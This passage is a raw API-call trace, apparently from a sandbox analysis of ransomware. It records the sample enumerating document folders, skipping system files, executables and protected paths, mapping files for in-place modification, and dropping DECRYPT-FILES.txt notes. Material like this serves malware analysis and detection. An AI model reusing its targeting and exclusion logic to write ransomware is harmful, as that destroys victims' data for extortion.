lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=92233) returned 1 [0185.361] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.361] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.362] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.362] CloseHandle (hObject=0x270) returned 1 [0185.362] CloseHandle (hObject=0x26c) returned 1 [0185.362] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.362] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed18bc50, ftCreationTime.dwHighDateTime=0x1d4d415, ftLastAccessTime.dwLowDateTime=0xfef0f2f0, ftLastAccessTime.dwHighDateTime=0x1d4cd92, ftLastWriteTime.dwLowDateTime=0xaea6af20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x13629, dwReserved0=0x0, dwReserved1=0x0, cFileName="zpuJN1WAt0WkY.doc.bDjWT", cAlternateFileName="ZPUJN1~1.BDJ")) returned 1 [0185.362] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc.bDjWT", lpString2="DECRYPT-FILES.txt") returned 1 [0185.362] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc.bDjWT", lpString2="autorun.inf") returned 1 [0185.362] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc.bDjWT", lpString2="boot.ini") returned 1 [0185.362] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc.bDjWT", lpString2="desktop.ini") returned 1 [0185.362] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc.bDjWT", lpString2="ntuser.dat") returned 1 [0185.362] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc.bDjWT", lpString2="iconcache.db") returned 1 [0185.362] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc.bDjWT", lpString2="bootsect.bak") returned 1 [0185.362] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc.bDjWT", lpString2="ntuser.dat.log") returned 1 [0185.362] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc.bDjWT", lpString2="thumbs.db") returned 1 [0185.362] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc.bDjWT", lpString2="Bootfont.bin") returned 1 [0185.362] lstrlenW (lpString="zpuJN1WAt0WkY.doc.bDjWT") returned 23 [0185.362] lstrcmpiW (lpString1="bDjWT", lpString2="lnk") returned -1 [0185.362] lstrcmpiW (lpString1="bDjWT", lpString2="exe") returned -1 [0185.362] lstrcmpiW (lpString1="bDjWT", lpString2="sys") returned -1 [0185.362] lstrcmpiW (lpString1="bDjWT", lpString2="dll") returned -1 [0185.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0185.363] lstrlenW (lpString="zpuJN1WAt0WkY.doc.bDjWT") returned 23 [0185.363] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" [0185.363] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpString2="zpuJN1WAt0WkY.doc.bDjWT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\zpuJN1WAt0WkY.doc.bDjWT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\zpuJN1WAt0WkY.doc.bDjWT" [0185.363] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\zpuJN1WAt0WkY.doc.bDjWT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\zpujn1wat0wky.doc.bdjwt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.363] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=79401) returned 1 [0185.363] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.363] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.364] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.364] CloseHandle (hObject=0x270) returned 1 [0185.364] CloseHandle (hObject=0x26c) returned 1 [0185.364] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.364] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed18bc50, ftCreationTime.dwHighDateTime=0x1d4d415, ftLastAccessTime.dwLowDateTime=0xfef0f2f0, ftLastAccessTime.dwHighDateTime=0x1d4cd92, ftLastWriteTime.dwLowDateTime=0xaea6af20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x13629, dwReserved0=0x0, dwReserved1=0x0, cFileName="zpuJN1WAt0WkY.doc.bDjWT", cAlternateFileName="ZPUJN1~1.BDJ")) returned 0 [0185.364] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0185.364] CloseHandle (hObject=0x264) returned 1 [0185.365] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe35f2bf0, ftCreationTime.dwHighDateTime=0x1d4cc67, ftLastAccessTime.dwLowDateTime=0x370df4a0, ftLastAccessTime.dwHighDateTime=0x1d4d3e5, ftLastWriteTime.dwLowDateTime=0xaea91080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18711, dwReserved0=0x0, dwReserved1=0x0, cFileName="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC", cAlternateFileName="M7WNYA~1.FEC")) returned 1 [0185.365] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC", lpString2="DECRYPT-FILES.txt") returned 1 [0185.365] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC", lpString2="autorun.inf") returned 1 [0185.365] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC", lpString2="boot.ini") returned 1 [0185.365] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC", lpString2="desktop.ini") returned 1 [0185.365] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC", lpString2="ntuser.dat") returned -1 [0185.365] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC", lpString2="iconcache.db") returned 1 [0185.365] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC", lpString2="bootsect.bak") returned 1 [0185.365] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC", lpString2="ntuser.dat.log") returned -1 [0185.365] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC", lpString2="thumbs.db") returned -1 [0185.365] lstrcmpiW (lpString1="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC", lpString2="Bootfont.bin") returned 1 [0185.365] lstrlenW (lpString="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC") returned 30 [0185.365] lstrcmpiW (lpString1="fEcxRC", lpString2="lnk") returned -1 [0185.365] lstrcmpiW (lpString1="fEcxRC", lpString2="exe") returned 1 [0185.365] lstrcmpiW (lpString1="fEcxRC", lpString2="sys") returned -1 [0185.365] lstrcmpiW (lpString1="fEcxRC", lpString2="dll") returned 1 [0185.365] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.365] lstrlenW (lpString="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC") returned 30 [0185.365] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0185.365] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC" [0185.365] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\M7WNYa5Nq7JGPdqVYb7.csv.fEcxRC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\m7wnya5nq7jgpdqvyb7.csv.fecxrc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.366] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=100113) returned 1 [0185.366] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.366] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.371] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.371] CloseHandle (hObject=0x268) returned 1 [0185.371] CloseHandle (hObject=0x264) returned 1 [0185.371] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.371] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa31f0, ftCreationTime.dwHighDateTime=0x1d4c5ce, ftLastAccessTime.dwLowDateTime=0xc91a6a90, ftLastAccessTime.dwHighDateTime=0x1d4cc3d, ftLastWriteTime.dwLowDateTime=0xaea91080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6ded, dwReserved0=0x0, dwReserved1=0x0, cFileName="MrkuYIww.pps.fEcxRC", cAlternateFileName="MRKUYI~1.FEC")) returned 1 [0185.371] lstrcmpiW (lpString1="MrkuYIww.pps.fEcxRC", lpString2="DECRYPT-FILES.txt") returned 1 [0185.372] lstrcmpiW (lpString1="MrkuYIww.pps.fEcxRC", lpString2="autorun.inf") returned 1 [0185.372] lstrcmpiW (lpString1="MrkuYIww.pps.fEcxRC", lpString2="boot.ini") returned 1 [0185.372] lstrcmpiW (lpString1="MrkuYIww.pps.fEcxRC", lpString2="desktop.ini") returned 1 [0185.372] lstrcmpiW (lpString1="MrkuYIww.pps.fEcxRC", lpString2="ntuser.dat") returned -1 [0185.372] lstrcmpiW (lpString1="MrkuYIww.pps.fEcxRC", lpString2="iconcache.db") returned 1 [0185.372] lstrcmpiW (lpString1="MrkuYIww.pps.fEcxRC", lpString2="bootsect.bak") returned 1 [0185.372] lstrcmpiW (lpString1="MrkuYIww.pps.fEcxRC", lpString2="ntuser.dat.log") returned -1 [0185.372] lstrcmpiW (lpString1="MrkuYIww.pps.fEcxRC", lpString2="thumbs.db") returned -1 [0185.372] lstrcmpiW (lpString1="MrkuYIww.pps.fEcxRC", lpString2="Bootfont.bin") returned 1 [0185.372] lstrlenW (lpString="MrkuYIww.pps.fEcxRC") returned 19 [0185.372] lstrcmpiW (lpString1="fEcxRC", lpString2="lnk") returned -1 [0185.372] lstrcmpiW (lpString1="fEcxRC", lpString2="exe") returned 1 [0185.372] lstrcmpiW (lpString1="fEcxRC", lpString2="sys") returned -1 [0185.372] lstrcmpiW (lpString1="fEcxRC", lpString2="dll") returned 1 [0185.372] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.372] lstrlenW (lpString="MrkuYIww.pps.fEcxRC") returned 19 [0185.372] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0185.372] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="MrkuYIww.pps.fEcxRC" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\MrkuYIww.pps.fEcxRC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\MrkuYIww.pps.fEcxRC" [0185.372] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.372] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\MrkuYIww.pps.fEcxRC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\mrkuyiww.pps.fecxrc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.373] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=28141) returned 1 [0185.373] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.373] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.373] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.373] CloseHandle (hObject=0x268) returned 1 [0185.373] CloseHandle (hObject=0x264) returned 1 [0185.373] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.374] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc00d9a30, ftCreationTime.dwHighDateTime=0x1d4c62a, ftLastAccessTime.dwLowDateTime=0xaeb4f760, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaeb4f760, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="narDJcaEcu74Unr7M", cAlternateFileName="NARDJC~1")) returned 1 [0185.374] lstrcmpW (lpString1="narDJcaEcu74Unr7M", lpString2=".") returned 1 [0185.374] lstrcmpW (lpString1="narDJcaEcu74Unr7M", lpString2="..") returned 1 [0185.374] lstrcatW (in: lpString1="narDJcaEcu74Unr7M", lpString2="\\" | out: lpString1="narDJcaEcu74Unr7M\\") returned="narDJcaEcu74Unr7M\\" [0185.374] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="narDJcaEcu74Unr7M\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\Program Files") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch=":\\Windows") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\Games\\") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\All Users") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="AhnLab") returned 0x0 [0185.374] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.374] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0185.374] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.374] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\\\0a16c9.tmp") returned 86 [0185.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0185.377] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0185.377] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.377] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\\\DECRYPT-FILES.txt") returned 93 [0185.377] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.377] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0185.377] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\*" [0185.377] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc00d9a30, ftCreationTime.dwHighDateTime=0x1d4c62a, ftLastAccessTime.dwLowDateTime=0xf132c180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf132c180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0185.377] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.377] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc00d9a30, ftCreationTime.dwHighDateTime=0x1d4c62a, ftLastAccessTime.dwLowDateTime=0xf132c180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf132c180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.377] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.377] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf132c180, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf132c180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf132c180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.377] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.377] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.377] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.377] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.377] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.377] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.377] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.378] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.378] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.378] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.378] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.378] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.378] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.378] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.378] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.378] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0185.378] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.378] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" [0185.378] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\0a16c9.tmp" [0185.378] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.378] CloseHandle (hObject=0x0) returned 0 [0185.378] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.378] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddcfac60, ftCreationTime.dwHighDateTime=0x1d4cdb0, ftLastAccessTime.dwLowDateTime=0xfaa93590, ftLastAccessTime.dwHighDateTime=0x1d4cd2e, 